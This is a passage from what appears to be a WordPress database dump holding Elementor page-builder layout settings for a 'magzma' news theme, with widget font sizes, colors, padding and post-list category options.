st-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1078,402,'_elementor_version','0.4'),(1079,402,'_elementor_css','a:3:{s:4:\"time\";i:1508850518;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1080,403,'_elementor_edit_mode','builder'),(1081,403,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"